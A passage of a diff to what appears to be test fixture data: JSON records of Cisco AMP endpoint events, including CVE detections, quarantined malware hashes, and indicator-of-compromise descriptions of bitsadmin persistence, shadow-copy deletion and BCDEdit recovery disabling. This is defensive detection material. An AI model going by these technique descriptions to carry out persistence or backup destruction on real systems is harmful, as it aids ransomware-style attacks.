Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine 